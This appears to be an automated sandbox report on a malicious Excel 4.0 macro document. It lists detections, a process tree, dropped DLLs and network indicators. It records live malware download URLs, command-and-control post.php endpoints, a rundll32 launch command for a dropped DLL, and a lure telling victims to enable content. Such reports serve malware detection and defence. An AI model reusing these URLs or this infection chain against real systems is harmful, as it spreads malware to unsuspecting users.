Loading ...

Play interactive tourEdit tour

Analysis Report case (4335).xls

Overview

General Information

Sample Name:case (4335).xls
Analysis ID:344665
MD5:bf86559630b855e4bf2c54d641147b24
SHA1:182cbac1bdd020fa5fee6ed9d6a50d1071fbe320
SHA256:31ea3370ca06a2af45514a59a0ae49dc62ac34bc4dce44402f169a9d6fb93853
Tags:xls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to inject code into remote processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found malicious URLs in unpacked macro 4.0 sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the product ID of Windows
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2240 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2312 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2408 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • msiexec.exe (PID: 2848 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
case (4335).xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2240, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 2312

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: 4.2.rundll32.exe.340000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
    Source: 5.2.msiexec.exe.d0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.60.169:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49168 version: TLS 1.2
    Binary contains paths to debug symbolsShow sources
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: scfrd[1].dll.0.dr

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: scfrd[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exeJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 0000000Ah4_2_0034D830
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]4_2_00358830
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 00000000h4_2_0035DA70
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then add esi, 02h4_2_0035CE40
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 0000000Ah5_2_000DD830
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]5_2_000E8830
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h5_2_000ECE40
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 00000000h5_2_000EDA70
    Source: global trafficDNS query: name: rnollg.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443

    Networking:

    barindex
    Found malicious URLs in unpacked macro 4.0 sheetShow sources
    Source: before.1.0.0.sheet.csv_unpackMacro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D1AF0 InternetReadFile,5_2_000D1AF0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: rnollg.com
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: msiexec.exe, 00000005.00000002.2356240442.0000000002060000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 0FDE0000.0.drString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
    Source: case (4335).xlsString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
    Source: msiexec.exe, 00000005.00000002.2356240442.0000000002060000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/f
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.phpMb
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.phpab
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/post.php
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: https://homesoapmolds.com/
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: before.1.0.0.sheet.csv_unpackString found in binary or memory: https://rnollg.com/kev/scfrd.dll
    Source: case (4335).xls, 0FDE0000.0.drString found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.60.169:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: case (4335).xlsInitial sample: URLDownloadToFileA
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable content on the yellow bar to run plugin Core decryption. 9 10 11 12 13 14 15 16 17
    Source: Screenshot number: 8Screenshot OCR: Enable Content X I J10 - "," jR V A B C D E F G H I J K L M N O P Q R S L=j 301 302 303 304
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: case (4335).xlsInitial sample: CALL
    Source: case (4335).xlsInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: case (4335).xlsInitial sample: Sheet size: 503434
    Found obfuscated Excel 4.0 MacroShow sources
    Source: case (4335).xlsInitial sample: High usage of CHAR() function: 147
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00349C604_2_00349C60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00343A304_2_00343A30
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0035DA704_2_0035DA70
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00349A604_2_00349A60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00355BF04_2_00355BF0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040D8064_2_0040D806
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040F8FD4_2_0040F8FD
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040D2C44_2_0040D2C4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040BB6E4_2_0040BB6E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040DD484_2_0040DD48
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D9C605_2_000D9C60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D3A305_2_000D3A30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D9A605_2_000D9A60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000EDA705_2_000EDA70
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E5BF05_2_000E5BF0
    Source: Joe Sandbox ViewDropped File: C:\ProgramData\formnet.dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: way.dll.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal100.expl.evad.winXLS@7/12@4/4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E9C90 AdjustTokenPrivileges,5_2_000E9C90
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,4_2_003569A0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\0FDE0000Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD171.tmpJump to behavior
    Source: case (4335).xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServerJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServerJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exeJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: scfrd[1].dll.0.dr
    Source: case (4335).xlsInitial sample: OLE summary lastprinted = 2021-01-26 16:17:13
    Source: case (4335).xlsInitial sample: OLE indicators vbamacros = False
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0034D830 LoadLibraryA,GetProcAddress,4_2_0034D830
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036D1F2 push dword ptr [ecx]; iretd 4_2_0036D1F9
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036E9FA push esi; retf 4_2_0036EABE
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036EA51 push esi; retf 4_2_0036EABE
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00369A5D push ebp; iretd 4_2_00369AEF
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003682EB push eax; ret 4_2_0036834A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004093ED push ecx; ret 4_2_00409400
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036B56F push esp; ret 4_2_0036B581
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036B700 push ss; ret 4_2_0036B735
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00422B73 push esi; ret 4_2_00422B75
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Ubc\way.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
